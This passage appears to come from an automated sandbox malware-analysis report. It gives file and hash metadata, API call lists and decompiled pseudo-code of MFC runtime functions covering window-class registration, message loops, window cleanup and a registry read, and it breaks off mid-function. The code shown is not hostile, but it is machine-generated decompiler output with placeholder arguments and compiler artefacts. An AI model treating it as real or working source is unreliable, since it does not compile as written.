                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                  • String ID:
                  • API String ID: 168474834-0
                  • Opcode ID: bedf1e10ced3285de7250cc8c666455f1f5cfd4d124595d5aa942ecaeb77b161
                  • Instruction ID: bbd677760f138881dd7ae0489db86b231f3a396aeeebb2e27cef093158ae2043
                  • Opcode Fuzzy Hash: bedf1e10ced3285de7250cc8c666455f1f5cfd4d124595d5aa942ecaeb77b161
                  • Instruction Fuzzy Hash: 0F1191B1940604BBDB319FA6CC89DAFBBFDFB88744B00041AF645D2221DB39D951DB28
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 94%
                  			E00411247(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                  				intOrPtr _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				char* _v20;
                  				signed int _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v40;
                  				intOrPtr _v52;
                  				signed int _v56;
                  				void* __ebp;
                  				intOrPtr _t127;
                  				void* _t133;
                  				intOrPtr _t135;
                  				signed int _t145;
                  				signed int _t150;
                  				signed int _t183;
                  				signed int _t185;
                  				signed int _t187;
                  				signed int _t189;
                  				signed int _t191;
                  				signed int _t195;
                  				void* _t198;
                  				intOrPtr _t199;
                  				signed int _t209;
                  
                  				_t198 = __ecx;
                  				_t127 = E0042083D(__ebx, __edi, __esi, __eflags);
                  				_v8 = _t127;
                  				_t3 =  &_a4;
                  				 *_t3 = _a4 &  !( *(_t127 + 0x18));
                  				if( *_t3 == 0) {
                  					return 1;
                  				}
                  				_push(__ebx);
                  				_push(__esi);
                  				_push(__edi);
                  				_t209 = 0;
                  				E004281D0(0,  &_v56, 0, 0x28);
                  				_v52 = DefWindowProcW;
                  				_t133 = E0042083D(__ebx, 0, 0, __eflags);
                  				__eflags = _a4 & 0x00000001;
                  				_v40 =  *((intOrPtr*)(_t133 + 8));
                  				_t135 =  *0x44fc50; // 0x10003
                  				_t195 = 8;
                  				_v32 = _t135;
                  				_v16 = _t195;
                  				if(__eflags != 0) {
                  					_push( &_v56);
                  					_v56 = 0xb;
                  					_v20 = L"AfxWnd90su";
                  					_t191 = E00410F44(_t195, _t198, 0, 0, __eflags);
                  					__eflags = _t191;
                  					if(_t191 != 0) {
                  						_t209 = 1;
                  						__eflags = 1;
                  					}
                  				}
                  				__eflags = _a4 & 0x00000020;
                  				if(__eflags != 0) {
                  					_v56 = _v56 | 0x0000008b;
                  					_push( &_v56);
                  					_v20 = L"AfxOleControl90su";
                  					_t189 = E00410F44(_t195, _t198, 0, _t209, __eflags);
                  					__eflags = _t189;
                  					if(_t189 != 0) {
                  						_t209 = _t209 | 0x00000020;
                  						__eflags = _t209;
                  					}
                  				}
                  				__eflags = _a4 & 0x00000002;
                  				if(__eflags != 0) {
                  					_push( &_v56);
                  					_v56 = 0;
                  					_v20 = L"AfxControlBar90su";
                  					_v28 = 0x10;
                  					_t187 = E00410F44(_t195, _t198, 0, _t209, __eflags);
                  					__eflags = _t187;
                  					if(_t187 != 0) {
                  						_t209 = _t209 | 0x00000002;
                  						__eflags = _t209;
                  					}
                  				}
                  				__eflags = _a4 & 0x00000004;
                  				if(__eflags != 0) {
                  					_v56 = _t195;
                  					_v28 = 0;
                  					_t185 = E00411203(_t198, __eflags,  &_v56, L"AfxMDIFrame90su", 0x7a01);
                  					__eflags = _t185;
                  					if(_t185 != 0) {
                  						_t209 = _t209 | 0x00000004;
                  						__eflags = _t209;
                  					}
                  				}
                  				__eflags = _a4 & _t195;
                  				if(__eflags != 0) {
                  					_v56 = 0xb;
                  					_v28 = 6;
                  					_t183 = E00411203(_t198, __eflags,  &_v56, L"AfxFrameOrView90su", 0x7a02);
                  					__eflags = _t183;
                  					if(_t183 != 0) {
                  						_t209 = _t209 | _t195;
                  						__eflags = _t209;
                  					}
                  				}
                  				__eflags = _a4 & 0x00000010;
                  				if(__eflags != 0) {
                  					_v12 = 0xff;
                  					_t209 = _t209 | E0040E900(_t195, _t198, _t209, __eflags,  &_v16, 0x3fc0);
                  					_t48 =  &_a4;
                  					 *_t48 = _a4 & 0xffffc03f;
                  					__eflags =  *_t48;
                  				}
                  				__eflags = _a4 & 0x00000040;
                  				if(__eflags != 0) {
                  					_v12 = 0x10;
                  					_t209 = _t209 | E0040E900(_t195, _t198, _t209, __eflags,  &_v16, 0x40);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00000080;
                  				if(__eflags != 0) {
                  					_v12 = 2;
                  					_t209 = _t209 | E0040E900(_t195, _t198, _t209, __eflags,  &_v16, 0x80);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00000100;
                  				if(__eflags != 0) {
                  					_v12 = _t195;
                  					_t209 = _t209 | E0040E900(_t195, _t198, _t209, __eflags,  &_v16, 0x100);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00000200;
                  				if(__eflags != 0) {
                  					_v12 = 0x20;
                  					_t209 = _t209 | E0040E900(_t195, _t198, _t209, __eflags,  &_v16, 0x200);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00000400;
                  				if(__eflags != 0) {
                  					_v12 = 1;
                  					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x400);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00000800;
                  				if(__eflags != 0) {
                  					_v12 = 0x40;
                  					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x800);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00001000;
                  				if(__eflags != 0) {
                  					_v12 = 4;
                  					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x1000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00002000;
                  				if(__eflags != 0) {
                  					_v12 = 0x80;
                  					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x2000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00004000;
                  				if(__eflags != 0) {
                  					_v12 = 0x800;
                  					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x4000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00008000;
                  				if(__eflags != 0) {
                  					_v12 = 0x400;
                  					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x8000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00010000;
                  				if(__eflags != 0) {
                  					_v12 = 0x200;
                  					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x10000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00020000;
                  				if(__eflags != 0) {
                  					_v12 = 0x100;
                  					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x20000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00040000;
                  				if(__eflags != 0) {
                  					_v12 = 0x8000;
                  					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x40000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00080000;
                  				if(__eflags != 0) {
                  					_v12 = 0x1000;
                  					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x80000);
                  					__eflags = _t209;
                  				}
                  				_t199 = _v8;
                  				 *(_t199 + 0x18) =  *(_t199 + 0x18) | _t209;
                  				_t145 =  *(_t199 + 0x18);
                  				__eflags = (_t145 & 0x00003fc0) - 0x3fc0;
                  				if((_t145 & 0x00003fc0) == 0x3fc0) {
                  					 *(_t199 + 0x18) = _t145 | 0x00000010;
                  					_t209 = _t209 | 0x00000010;
                  					__eflags = _t209;
                  				}
                  				asm("sbb eax, eax");
                  				_t150 =  ~((_t209 & _a4) - _a4) + 1;
                  				__eflags = _t150;
                  				return _t150;
                  			}




























                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: _memset
                  • String ID: @$@$AfxControlBar90su$AfxFrameOrView90su$AfxMDIFrame90su
                  • API String ID: 2102423945-3496641829
                  • Opcode ID: 6cceaf9ea324d156bfa85db5fdaeaea66b675dc4feb85c5299ba7c8ac1242083
                  • Instruction ID: 9cf35d91a07b06ad6a92d677c80e44749e622615207f3f3e31b7e7cb5f228e6a
                  • Opcode Fuzzy Hash: 6cceaf9ea324d156bfa85db5fdaeaea66b675dc4feb85c5299ba7c8ac1242083
                  • Instruction Fuzzy Hash: 469145B1D0020D6EDB50DFA5D485BDEBBF8AF04344F20856AFE18E7191E7789A84C7A4
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 63%
                  			E00419453(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                  				signed int _v8;
                  				char _v17;
                  				char _v18;
                  				signed int _v19;
                  				char _v28;
                  				long _v32;
                  				signed int _v36;
                  				char _v52;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t43;
                  				signed int _t50;
                  				signed char _t57;
                  				void* _t68;
                  				void* _t86;
                  				intOrPtr* _t87;
                  				intOrPtr* _t88;
                  				signed int _t89;
                  
                  				_t86 = __edx;
                  				_t43 =  *0x44c364; // 0xa6e2bca1
                  				_v8 = _t43 ^ _t89;
                  				_t87 = _a8;
                  				_t88 = __ecx;
                  				_push( &_v28);
                  				_push(_a4);
                  				_push(0x417);
                  				 *((intOrPtr*)( *__ecx + 0x118))();
                  				 *(_t87 + 8) =  *(_t87 + 8) ^ 0x00000004;
                  				_v18 = 0;
                  				_v17 = 0;
                  				 *((char*)(_t87 + 0xa)) = 0;
                  				 *((char*)(_t87 + 0xb)) = 0;
                  				if(E00429472(_t87,  &_v28, 0x14) != 0) {
                  					_t50 = E00411D59(_t88);
                  					_t69 = _t50;
                  					_v36 = _t50;
                  					E00411D8D(_t88, 0x10000000, 0, 0);
                  					 *((intOrPtr*)( *_t88 + 0x118))(0x416, _a4, 0, _t68);
                  					if( *((intOrPtr*)(_t87 + 0x10)) < 0xffffffff) {
                  						_v32 = SendMessageW( *(_t88 + 0x20), 0x43d, 0, 0);
                  						SendMessageW( *(_t88 + 0x20), 0xb, 0, 0);
                  						SendMessageW( *(_t88 + 0x20), 0x43c, _v32 + 1, 0);
                  						SendMessageW( *(_t88 + 0x20), 0x43c, _v32, 0);
                  						SendMessageW( *(_t88 + 0x20), 0xb, 1, 0);
                  						 *((intOrPtr*)(_t87 + 0x10)) =  *((intOrPtr*)(_t87 + 0x10)) + 0xf4240;
                  						_t69 = _v36;
                  					}
                  					 *((intOrPtr*)( *_t88 + 0x118))(_a4, _t87);
                  					E00411D8D(_t88, 0, _t69 & 0x10000000, 0);
                  					_t57 =  *((intOrPtr*)(_t87 + 9));
                  					_t68 = 0x415;
                  					if(((_t57 ^ _v19) & 0x00000001) != 0 || (_t57 & 0x00000001) != 0 &&  *_t87 != _v28) {
                  						_push(1);
                  						_push(0);
                  						goto L9;
                  					} else {
                  						_push( &_v52);
                  						_push(_a4);
                  						_push(0x41d);
                  						if( *((intOrPtr*)( *_t88 + 0x118))() != 0) {
                  							_push(1);
                  							_push( &_v52);
                  							L9:
                  							_t48 = InvalidateRect( *(_t88 + 0x20), ??, ??);
                  						}
                  					}
                  				}
                  				return E00427DFF(_t48, _t68, _v8 ^ _t89, _t86, _t87, _t88);
                  			}























                  APIs
                  • _memcmp.LIBCMT ref: 0041949D
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  • SendMessageW.USER32(?,0000043D,00000000,00000000), ref: 004194F6
                  • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00419504
                  • SendMessageW.USER32(?,0000043C,?,00000000), ref: 00419515
                  • SendMessageW.USER32(?,0000043C,?,00000000), ref: 00419524
                  • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 0041952F
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004195A2
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageSend$InvalidateLongRectWindow_memcmp
                  • String ID:
                  • API String ID: 235743446-0
                  • Opcode ID: cecb05129a4dfe5713b718d7de243bcf6fc204b0a11809aaac0acef328da63e1
                  • Instruction ID: 103a916b92102e25fa1ce158748eedf17b73825095c91fdbe9e0559b18bc47bb
                  • Opcode Fuzzy Hash: cecb05129a4dfe5713b718d7de243bcf6fc204b0a11809aaac0acef328da63e1
                  • Instruction Fuzzy Hash: 8D417E31740308BBEB219B64CC56FEEBBB5BF08B10F104119FA956A2D1C7B5A9408B98
                  Uniqueness

                  Uniqueness Score: 10.55%

                  C-Code - Quality: 92%
                  			E0040DC98(intOrPtr* __ecx, signed int _a4) {
                  				int _v8;
                  				int _v12;
                  				int _v16;
                  				struct tagMSG* _v20;
                  				struct HWND__* _v24;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct HWND__* _t48;
                  				struct tagMSG* _t49;
                  				signed int _t51;
                  				void* _t54;
                  				void* _t56;
                  				int _t59;
                  				long _t62;
                  				signed int _t66;
                  				void* _t69;
                  				intOrPtr* _t71;
                  				intOrPtr* _t74;
                  
                  				_t70 = __ecx;
                  				_t74 = __ecx;
                  				_v16 = 1;
                  				_v12 = 0;
                  				if((_a4 & 0x00000004) == 0) {
                  					L2:
                  					_v8 = 0;
                  					L3:
                  					_t48 = GetParent( *(_t74 + 0x20));
                  					 *(_t74 + 0x3c) =  *(_t74 + 0x3c) | 0x00000018;
                  					_v24 = _t48;
                  					_t49 = E0041D6B4(_t76);
                  					_t69 = UpdateWindow;
                  					_v20 = _t49;
                  					while(1) {
                  						_t77 = _v16;
                  						if(_v16 == 0) {
                  							goto L15;
                  						}
                  						while(1) {
                  							L15:
                  							_t51 = E0041DAE1(_t70, 0, _t74, _t77);
                  							if(_t51 == 0) {
                  								break;
                  							}
                  							if(_v8 != 0) {
                  								_t59 = _v20->message;
                  								if(_t59 == 0x118 || _t59 == 0x104) {
                  									E00411E2C(_t74, 1);
                  									UpdateWindow( *(_t74 + 0x20));
                  									_v8 = 0;
                  								}
                  							}
                  							_t71 = _t74;
                  							_t54 =  *((intOrPtr*)( *_t74 + 0x88))();
                  							_t82 = _t54;
                  							if(_t54 == 0) {
                  								_t45 = _t74 + 0x3c;
                  								 *_t45 =  *(_t74 + 0x3c) & 0xffffffe7;
                  								__eflags =  *_t45;
                  								return  *((intOrPtr*)(_t74 + 0x44));
                  							} else {
                  								_push(_v20);
                  								_t56 = E0041D9E4(_t69, _t71, 0, _t74, _t82);
                  								_pop(_t70);
                  								if(_t56 != 0) {
                  									_v16 = 1;
                  									_v12 = 0;
                  								}
                  								if(PeekMessageW(_v20, 0, 0, 0, 0) == 0) {
                  									while(1) {
                  										_t77 = _v16;
                  										if(_v16 == 0) {
                  											goto L15;
                  										}
                  										goto L4;
                  									}
                  								}
                  								continue;
                  							}
                  						}
                  						_push(0);
                  						E0041CD10();
                  						return _t51 | 0xffffffff;
                  						L4:
                  						__eflags = PeekMessageW(_v20, 0, 0, 0, 0);
                  						if(__eflags != 0) {
                  							goto L15;
                  						} else {
                  							__eflags = _v8;
                  							if(_v8 != 0) {
                  								_t70 = _t74;
                  								E00411E2C(_t74, 1);
                  								UpdateWindow( *(_t74 + 0x20));
                  								_v8 = 0;
                  							}
                  							__eflags = _a4 & 0x00000001;
                  							if((_a4 & 0x00000001) == 0) {
                  								__eflags = _v24;
                  								if(_v24 != 0) {
                  									__eflags = _v12;
                  									if(_v12 == 0) {
                  										SendMessageW(_v24, 0x121, 0,  *(_t74 + 0x20));
                  									}
                  								}
                  							}
                  							__eflags = _a4 & 0x00000002;
                  							if(__eflags != 0) {
                  								L13:
                  								_v16 = 0;
                  								continue;
                  							} else {
                  								_t62 = SendMessageW( *(_t74 + 0x20), 0x36a, 0, _v12);
                  								_v12 = _v12 + 1;
                  								__eflags = _t62;
                  								if(__eflags != 0) {
                  									continue;
                  								}
                  								goto L13;
                  							}
                  						}
                  					}
                  				}
                  				_t66 = E00411D59(__ecx);
                  				_v8 = 1;
                  				_t76 = _t66 & 0x10000000;
                  				if((_t66 & 0x10000000) == 0) {
                  					goto L3;
                  				}
                  				goto L2;
                  			}
























                  APIs
                  • GetParent.USER32(?), ref: 0040DCCB
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0040DCEF
                  • UpdateWindow.USER32(?), ref: 0040DD0A
                  • SendMessageW.USER32(?,00000121,00000000,?), ref: 0040DD2B
                  • SendMessageW.USER32(?,0000036A,00000000,00000002), ref: 0040DD43
                  • UpdateWindow.USER32(?), ref: 0040DD86
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0040DDB7
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Message$Window$PeekSendUpdate$LongParent
                  • String ID:
                  • API String ID: 2853195852-0
                  • Opcode ID: c1a3acbe7e9895445762dbb2acfecde14220914493d92d80a943c50d69b1af6a
                  • Instruction ID: b9b26f931492f6c7c68de9eea99338710849bace1e9d5f3526f958d27a40dd5b
                  • Opcode Fuzzy Hash: c1a3acbe7e9895445762dbb2acfecde14220914493d92d80a943c50d69b1af6a
                  • Instruction Fuzzy Hash: 9341AC70E00205ABDF21AFA6C848EAFBBB4FF81704F10813EE541B22A0C7799944CB19
                  Uniqueness

                  Uniqueness Score: 0.22%

                  C-Code - Quality: 100%
                  			E0040E351(intOrPtr* __ecx) {
                  				struct HWND__* _v40;
                  				struct HWND__* _v44;
                  				intOrPtr _v48;
                  				void* _v52;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				long _t43;
                  				struct HWND__* _t48;
                  				long _t61;
                  				intOrPtr* _t63;
                  				signed int _t64;
                  				void* _t69;
                  				intOrPtr _t71;
                  				intOrPtr* _t72;
                  
                  				_t72 = __ecx;
                  				_t69 = E0041D6AB();
                  				if(_t69 != 0) {
                  					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
                  						 *((intOrPtr*)(_t69 + 0x20)) = 0;
                  					}
                  					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
                  						 *((intOrPtr*)(_t69 + 0x24)) = 0;
                  					}
                  				}
                  				_t63 =  *((intOrPtr*)(_t72 + 0x48));
                  				if(_t63 != 0) {
                  					 *((intOrPtr*)( *_t63 + 0x50))();
                  					 *((intOrPtr*)(_t72 + 0x48)) = 0;
                  				}
                  				_t64 =  *(_t72 + 0x4c);
                  				if(_t64 != 0) {
                  					 *((intOrPtr*)( *_t64 + 4))(1);
                  				}
                  				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
                  				_t83 =  *(_t72 + 0x3c) & 1;
                  				if(( *(_t72 + 0x3c) & 1) != 0) {
                  					_t71 =  *((intOrPtr*)(E00420870(1, _t64, _t69, _t72, _t83) + 0x3c));
                  					if(_t71 != 0) {
                  						_t85 =  *(_t71 + 0x20);
                  						if( *(_t71 + 0x20) != 0) {
                  							E004281D0(_t71,  &_v52, 0, 0x30);
                  							_t48 =  *(_t72 + 0x20);
                  							_v44 = _t48;
                  							_v40 = _t48;
                  							_v52 = 0x2c;
                  							_v48 = 1;
                  							SendMessageW( *(_t71 + 0x20), 0x433, 0,  &_v52);
                  						}
                  					}
                  				}
                  				_t61 = GetWindowLongW( *(_t72 + 0x20), 0xfffffffc);
                  				E0040E168(_t61, _t72, GetWindowLongW, _t85);
                  				if(GetWindowLongW( *(_t72 + 0x20), 0xfffffffc) == _t61) {
                  					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf8))());
                  					if(_t43 != 0) {
                  						SetWindowLongW( *(_t72 + 0x20), 0xfffffffc, _t43);
                  					}
                  				}
                  				E0040E297(_t61, _t72);
                  				return  *((intOrPtr*)( *_t72 + 0x11c))();
                  			}




















                  APIs
                  • _memset.LIBCMT ref: 0040E3E0
                  • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 0040E409
                  • GetWindowLongW.USER32(?,000000FC), ref: 0040E41B
                  • GetWindowLongW.USER32(?,000000FC), ref: 0040E42C
                  • SetWindowLongW.USER32(?,000000FC,?), ref: 0040E448
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: LongWindow$MessageSend_memset
                  • String ID: ,
                  • API String ID: 2997958587-3772416878
                  • Opcode ID: 46bd6ef82fd049dd01f3492840a1388d8c2fcc447518908e6ad8a5c2f51e20a9
                  • Instruction ID: fbb61049e8a99d83785df08a2d163878e1f878e9eea4074a88606dae4575e488
                  • Opcode Fuzzy Hash: 46bd6ef82fd049dd01f3492840a1388d8c2fcc447518908e6ad8a5c2f51e20a9
                  • Instruction Fuzzy Hash: A73193716003109FC720AF66D884A6FBBE4BF44314B15093EE686A7AD2DB38E810CB59
                  Uniqueness

                  Uniqueness Score: 1.79%

                  C-Code - Quality: 69%
                  			E0041DFBC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				void _t36;
                  				void* _t46;
                  				long _t60;
                  				void* _t65;
                  				void* _t82;
                  				void* _t83;
                  				intOrPtr _t91;
                  
                  				_t68 = __ecx;
                  				_t67 = __ebx;
                  				_push(0x228);
                  				E00429294(E00439335, __ebx, __edi, __esi);
                  				_t82 = __ecx;
                  				 *(_t83 - 0x224) = 0;
                  				 *(_t83 - 0x230) = 0;
                  				_t36 = E0041DDBF(__ecx, __edx);
                  				 *(_t83 - 0x22c) = _t36;
                  				if(_t36 != 0) {
                  					do {
                  						_t65 = _t83 - 0x22c;
                  						_push(_t65);
                  						_t68 = _t82;
                  						E0041DDD0();
                  						if(_t65 != 0) {
                  							_t68 = _t65;
                  							 *((intOrPtr*)( *_t65 + 0xc))(0, 0xfffffffc, 0, 0);
                  						}
                  					} while ( *(_t83 - 0x22c) != 0);
                  				}
                  				if( *((intOrPtr*)(_t82 + 0x54)) != 0) {
                  					_t91 =  *((intOrPtr*)(_t82 + 0x68));
                  					_t92 = _t91 == 0;
                  					if(_t91 == 0) {
                  						E00413DD0(_t68);
                  					}
                  					_push(L"Software\\");
                  					E00410F00(_t67, _t83 - 0x220, 0, _t82, _t92);
                  					 *((intOrPtr*)(_t83 - 4)) = 0;
                  					E00405700(_t83 - 0x220,  *((intOrPtr*)(_t82 + 0x54)));
                  					_push("\\");
                  					_push(_t83 - 0x220);
                  					_push(_t83 - 0x234);
                  					_t46 = E0041281A(_t67, 0, _t82, _t92);
                  					_push( *((intOrPtr*)(_t82 + 0x68)));
                  					 *((char*)(_t83 - 4)) = 1;
                  					_push(_t46);
                  					_push(_t83 - 0x228);
                  					E0041281A(_t67, 0, _t82, _t92);
                  					 *((char*)(_t83 - 4)) = 3;
                  					E004055F0( *((intOrPtr*)(_t83 - 0x234)) + 0xfffffff0);
                  					_push(_t83 - 0x228);
                  					_t82 = 0x80000001;
                  					_push(0x80000001);
                  					E0041DE3E(_t67, 0, 0x80000001, _t92);
                  					if(RegOpenKeyW(0x80000001,  *(_t83 - 0x220), _t83 - 0x224) == 0) {
                  						_t60 = RegEnumKeyW( *(_t83 - 0x224), 0, _t83 - 0x21c, 0x104);
                  						_t94 = _t60 - 0x103;
                  						if(_t60 == 0x103) {
                  							_push(_t83 - 0x220);
                  							_push(0x80000001);
                  							E0041DE3E(_t67, 0, 0x80000001, _t94);
                  						}
                  						RegCloseKey( *(_t83 - 0x224));
                  					}
                  					RegQueryValueW(_t82,  *(_t83 - 0x228), _t83 - 0x21c, _t83 - 0x230);
                  					E004055F0( &(( *(_t83 - 0x228))[0xfffffffffffffff8]));
                  					E004055F0( &(( *(_t83 - 0x220))[0xfffffffffffffff8]));
                  				}
                  				return E00429317(_t67, 0, _t82);
                  			}











                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0041DFC6
                  • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 0041E0AC
                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 0041E0C9
                  • RegCloseKey.ADVAPI32(?), ref: 0041E0E9
                  • RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 0041E104
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CloseEnumH_prolog3_OpenQueryValue
                  • String ID: Software\
                  • API String ID: 1666054129-964853688
                  • Opcode ID: b4a0d2341627dfdae7fef1d8aa0728049ad4d36d7fb9bc95688622beae7c11ac
                  • Instruction ID: b15c6a1d5bbe84e58404210d13961f1476762f43c285968fd0894417b26847e8
                  • Opcode Fuzzy Hash: b4a0d2341627dfdae7fef1d8aa0728049ad4d36d7fb9bc95688622beae7c11ac
                  • Instruction Fuzzy Hash: D2419871900528BBCB21EBA5DD49AEEB7B9AF48314F1405DAF405E2191D7789FC0CF18
                  Uniqueness

                  Uniqueness Score: 0.81%

                  C-Code - Quality: 97%
                  			E0041781C(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t34;
                  				intOrPtr _t36;
                  				int _t39;
                  				intOrPtr _t46;
                  				signed int _t57;
                  				signed int _t66;
                  				struct HWND__* _t71;
                  				signed int _t72;
                  				void* _t73;
                  
                  				_t58 = __ecx;
                  				_push(0x18);
                  				E0042922B(E00438E6B, __ebx, __edi, __esi);
                  				_t57 = __ecx;
                  				_t34 = __ecx + 0xb8;
                  				 *_t34 =  *_t34 + 1;
                  				if( *_t34 <= 1) {
                  					_t36 = E0040F8F7(__ecx, __edi);
                  					 *((intOrPtr*)(_t73 - 0x10)) = _t36;
                  					if(_t36 == 0) {
                  						L2:
                  						E00413DD0(_t58);
                  					}
                  					 *(_t73 - 0x24) = 0x43eb00;
                  					 *((intOrPtr*)(_t73 - 0x20)) = 0;
                  					 *((intOrPtr*)(_t73 - 0x14)) = 0;
                  					 *((intOrPtr*)(_t73 - 0x18)) = 0;
                  					 *(_t73 - 0x1c) = 0;
                  					 *(_t73 - 4) = 0;
                  					_t71 = GetWindow(GetDesktopWindow(), 5);
                  					if(_t71 != 0) {
                  						do {
                  							_t39 = IsWindowEnabled(_t71);
                  							_t80 = _t39;
